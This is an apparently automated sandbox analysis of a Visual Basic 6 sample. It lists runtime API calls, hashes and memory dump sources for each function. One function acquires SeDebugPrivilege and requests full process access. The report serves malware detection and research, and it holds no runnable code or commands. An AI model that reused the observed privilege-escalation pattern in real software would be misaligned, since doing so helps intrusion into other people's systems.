Opcode Fuzzy Hash: 8bb761deafcd7e2ded91a160ce823c526f59d3b1b33068874666e1dc9ed13cd2
Instruction Fuzzy Hash: 463160B1A00118DFCB14DFA4ED94DEEBB79EF88300B10456AE506E3261DB745986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00417139, Relevance: 27.1, APIs: 18, Instructions: 89COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
Opcode ID: 392004513970ef635da4a611ab646abaa928053d5d8163be545aabfb3d7528fd
Instruction ID: b391c340adbf3e59c3df7a7246d9472bd0b0b55e754b724d87d5f09335da3bbb
Opcode Fuzzy Hash: 392004513970ef635da4a611ab646abaa928053d5d8163be545aabfb3d7528fd
Instruction Fuzzy Hash: 1E310DB5A00118DBDB14DBA4ED84DEE7779EF88300F50856AE506A3261DF34A986CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041F150, Relevance: 27.1, APIs: 18, Instructions: 84COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
#537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
#606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
__vbaStrMove.MSVBVM60 ref: 0041F1D1
__vbaFreeVar.MSVBVM60 ref: 0041F1DA
__vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
__vbaFreeStr.MSVBVM60 ref: 0041F218
#537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
__vbaStrMove.MSVBVM60 ref: 0041F238
__vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
#616.MSVBVM60(?,-00000001), ref: 0041F251
__vbaStrMove.MSVBVM60 ref: 0041F25C
__vbaFreeStr.MSVBVM60 ref: 0041F265
__vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
__vbaErrorOverflow.MSVBVM60 ref: 0041F2B8

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ErrorMove$#537$#606#616AnsiChkstkOverflowSystemUnicode
String ID:
API String ID: 1093449089-0
Opcode ID: ee02f3b2826ffa236948fc2c1f65590c4aa55ef8d50380a296c512f1be7178e6
Instruction ID: 0e4e532b7f79ceded0d12069193019f5775f2f1d5aa758d8f51e06bfe5b2f4ca
Opcode Fuzzy Hash: ee02f3b2826ffa236948fc2c1f65590c4aa55ef8d50380a296c512f1be7178e6
Instruction Fuzzy Hash: 20311C75900149EFDB04DFA4DA4CBDEBBB8FF08305F108169E502B62A0DB755A05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2B0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
__vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
__vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
__vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
__vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 0041A39A
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041A3AB
__vbaFreeStr.MSVBVM60 ref: 0041A3C3
__vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 0041A420
__vbaSetSystemError.MSVBVM60(?), ref: 0041A475

Strings

SeDebugPrivilege, xrefs: 0041A391

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
String ID: SeDebugPrivilege
API String ID: 1749655604-2896544425
Opcode ID: a09d8b27c4e060d415cd38d35f886b830d8e55dcf0cb0396c666bdd4df63c9ca
Instruction ID: 4de2d3f6ed40af32cba968f736910ab2351f3027917a15dd84bedccea81ef083
Opcode Fuzzy Hash: a09d8b27c4e060d415cd38d35f886b830d8e55dcf0cb0396c666bdd4df63c9ca
Instruction Fuzzy Hash: D0514B70901308DBEB10DFA1DA49BEEBBB8FB04704F20816EE105AB291D7B84A45DF56

Uniqueness

Uniqueness Score: -1.00%

Function 00429F50, Relevance: 22.6, APIs: 15, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
__vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
__vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
__vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
__vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
__vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
String ID:
API String ID: 3031735744-0
Opcode ID: ec505b9da935685f743cf272e17281aba0119273a56e583c7af6864e293ea477
Instruction ID: 5fd8a786a428ecf44f1591115f944ef2e4a492f21aad71c04980f5145bc2ad87
Opcode Fuzzy Hash: ec505b9da935685f743cf272e17281aba0119273a56e583c7af6864e293ea477
Instruction Fuzzy Hash: B731DBB1900209EFCB04EFE4DE49FDE7BB8BB48705F108259F612B65A0D7745A48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00429E10, Relevance: 22.6, APIs: 15, Instructions: 76COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
__vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
__vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
String ID:
API String ID: 3031735744-0
Opcode ID: 8dba7990584796c2d513886add396c5f5192d76287c72b2b2e7eaf5777dcc1de
Instruction ID: ef05815d91a7badc13ce189a5e2ee1fd6bd11c379c37ab60153baacb3b4262a3
Opcode Fuzzy Hash: 8dba7990584796c2d513886add396c5f5192d76287c72b2b2e7eaf5777dcc1de
Instruction Fuzzy Hash: 5231CBB5910149EFCB04EFE4DE48EDEBBB8FB48715F108269F502B61A0DB745A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00415980, Relevance: 21.1, APIs: 14, Instructions: 91COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0041B687,0042C0E8,?), ref: 0041599E
__vbaOnError.MSVBVM60(000000FF,00000000,72A26C30,72A20EBE,?,Function_000032B6), ref: 004159CE
#580.MSVBVM60(?,00000000), ref: 004159E3
#648.MSVBVM60(0000000A), ref: 00415A02
__vbaFreeVar.MSVBVM60 ref: 00415A0F
__vbaFileOpen.MSVBVM60(00000020,000000FF,?), ref: 00415A2B
#570.MSVBVM60(?,?), ref: 00415A42
__vbaPut4.MSVBVM60(00000000,00000000,-00000001), ref: 00415A58
__vbaStrCopy.MSVBVM60 ref: 00415A6D
__vbaPut3.MSVBVM60(00000000,?,?), ref: 00415A7E
__vbaFreeStr.MSVBVM60 ref: 00415A87
__vbaFileClose.MSVBVM60(?), ref: 00415A99
#580.MSVBVM60(?,00000027), ref: 00415AAE
__vbaErrorOverflow.MSVBVM60 ref: 00415AE2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#580ErrorFileFree$#570#648ChkstkCloseCopyOpenOverflowPut3Put4
String ID:
API String ID: 633625294-0
Opcode ID: c184e6fed43095bbc808ed6dabd80215540fbf370ef609e54faf454b01daf8be
Instruction ID: 077cd5495f4d2610dc4ebb710a7c1806296cb1f910c24ca7336927bb814984b8
Opcode Fuzzy Hash: c184e6fed43095bbc808ed6dabd80215540fbf370ef609e54faf454b01daf8be
Instruction Fuzzy Hash: FE311AB5900208EFEB04DF94DA48BDEBBB8FF48715F108259F501BB6A0D7795A84CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00419B10, Relevance: 21.1, APIs: 14, Instructions: 82COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,?,0040DFD2,?,?,?,Function_000032B6), ref: 00419B2E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 00419B5E
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B79
#525.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419B83
__vbaStrMove.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B8E
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BA9
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BC4
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,?,Function_000032B6), ref: 00419BD6
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BE4
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BED
#519.MSVBVM60(?,?,?,?,?,?,?,Function_000032B6), ref: 00419BFE
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C09
__vbaFreeStr.MSVBVM60(00419C3D,?,?,?,?,?,?,Function_000032B6), ref: 00419C36
__vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C53

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$System$FreeMove$#519#525AnsiChkstkOverflowUnicode
String ID:
API String ID: 3463755217-0
Opcode ID: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
Instruction ID: 59ab86815b635178f25ac20134c8c30b5a73cca353c440905f8b97c0bcbdadc5
Opcode Fuzzy Hash: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
Instruction Fuzzy Hash: D331CE75900248EFCB04EFA4DA48BDE7BB4FB48305F108669F501B7260DB799A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004212F0, Relevance: 19.6, APIs: 13, Instructions: 120COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,72A219DC,00000000,00000FEE), ref: 0042134B
__vbaAryLock.MSVBVM60(?,00000000), ref: 00421365
__vbaGenerateBoundsError.MSVBVM60 ref: 00421386
__vbaGenerateBoundsError.MSVBVM60 ref: 00421395
__vbaAryLock.MSVBVM60(?,?), ref: 004213A2
__vbaGenerateBoundsError.MSVBVM60 ref: 004213BD
__vbaGenerateBoundsError.MSVBVM60 ref: 004213C6
__vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004213E9
__vbaAryUnlock.MSVBVM60(?), ref: 004213F9
__vbaAryUnlock.MSVBVM60(?), ref: 004213FF
__vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00421412
__vbaAryDestruct.MSVBVM60(00000000,?,0042143F,72A219DC,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF), ref: 00421438
__vbaErrorOverflow.MSVBVM60(00000000,72A219DC,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF,Function_000032B6), ref: 00421450

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
String ID:
API String ID: 3281955820-0
Opcode ID: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
Instruction ID: d3bc4d229a8ccd66a9bed061019a776db086e1d909af8dc46df260a90b41282b
Opcode Fuzzy Hash: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
Instruction Fuzzy Hash: 5E418170E00219DFDB14EF94DD81AAEF7B9EF58700F50811AE501B7660D6B4A8428BE9

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2F9, Relevance: 19.6, APIs: 13, Instructions: 104COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000004), ref: 0042A30A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0,?,?), ref: 0042A334
__vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188,?,?,?,?), ref: 0042A35B
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?), ref: 0042A36D
__vbaAryLock.MSVBVM60(?), ref: 0042A37D
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 0042A39C
__vbaGenerateBoundsError.MSVBVM60 ref: 0042A3B1
__vbaGenerateBoundsError.MSVBVM60 ref: 0042A3C7
__vbaI4Var.MSVBVM60(?,00000000,?,?,?,00000000), ref: 0042A3E6
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0042A3F6
__vbaAryUnlock.MSVBVM60(?), ref: 0042A400
__vbaFreeObj.MSVBVM60 ref: 0042A409
__vbaFreeVar.MSVBVM60 ref: 0042A412

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$CheckFreeHresult$CallLateLockRedimSystemUnlock
String ID:
API String ID: 204333147-0
Opcode ID: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
Instruction ID: 897c9a6cfbc361b2304c829fc1f6f3fe0cbd2f804f2c9409275e98d7ea74f451
Opcode Fuzzy Hash: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
Instruction Fuzzy Hash: E031A234600215EBDB04DBA0DD89EAEB779FF44704F208529F902BB2A1D774AC46CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041A090, Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
__vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157
__vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A175
__vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A1B2
__vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A207
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041A230
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041A246
__vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A26C
__vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041A28F

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$System$Chkstk
String ID:
API String ID: 1207130036-0
Opcode ID: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
Instruction ID: 8b7a934a7eebc36cfe3af54c4ed22efe6341180558cb6e4886e9f12f2822d10f
Opcode Fuzzy Hash: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
Instruction Fuzzy Hash: 7B51FA74901208EBDB10DFE4DA48BDEBBB5FF48308F208569E501B7390D7799A44DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E730, Relevance: 18.1, APIs: 12, Instructions: 85COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0040F418,0042C0BC,?), ref: 0041E74E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0041E77E
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0041E795
__vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7A1
__vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E7AF
__vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0041E7B8
__vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7D3
__vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7E4
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7F5
__vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E803
__vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,Function_000032B6), ref: 0041E811
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,Function_000032B6), ref: 0041E827

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
String ID:
API String ID: 3861917509-0
Opcode ID: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
Instruction ID: a92ad539ecbf6efebda2d3259df1282ada01a5d6d20107e5edffdf3838fad138
Opcode Fuzzy Hash: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
Instruction Fuzzy Hash: 61310CB5900208EFCB00DFE4DA88FDEBBB8EB48314F108259F501B7290C7789A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415830, Relevance: 18.1, APIs: 12, Instructions: 67COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(0040CEB3,004032B6,0040CEB3,?,?,?,00000000,004032B6), ref: 0041584E
__vbaOnError.MSVBVM60(000000FF,?,?,?,0040CEB3,004032B6,0040CEB3), ref: 0041587E
#648.MSVBVM60(0000000A), ref: 0041589D
__vbaFreeVar.MSVBVM60 ref: 004158AA
__vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 004158C9
#570.MSVBVM60(?), ref: 004158DB
#525.MSVBVM60(00000000), ref: 004158E2
__vbaStrMove.MSVBVM60 ref: 004158ED
__vbaGet3.MSVBVM60(00000000,?,?), ref: 00415905
__vbaFileClose.MSVBVM60(?), ref: 00415917
__vbaStrCopy.MSVBVM60 ref: 0041592A
__vbaFreeStr.MSVBVM60(0041595E), ref: 00415957

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
String ID:
API String ID: 947554498-0
Opcode ID: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
Instruction ID: 9d0290c9668b0b97bc5e056eca09828b1551f52cd0b7d0ae963dc3f7ea44dd8b
Opcode Fuzzy Hash: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
Instruction Fuzzy Hash: A0314BB5C00248EBDB00DFD4DA48BDEBBB8FF08714F208159E611B72A0DB795A48CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00405037, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040FF4E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040FF95
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0040FFC6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,0000004C), ref: 0040FFF9
__vbaFreeObj.MSVBVM60 ref: 00410038
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410081
__vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,00000040), ref: 004100B9
__vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 004100DC
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004100EF
__vbaCastObj.MSVBVM60(00000000,004077C4), ref: 00410112
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041011D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 00410150
__vbaFreeObj.MSVBVM60 ref: 0041016B

Strings

[, xrefs: 00405037

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
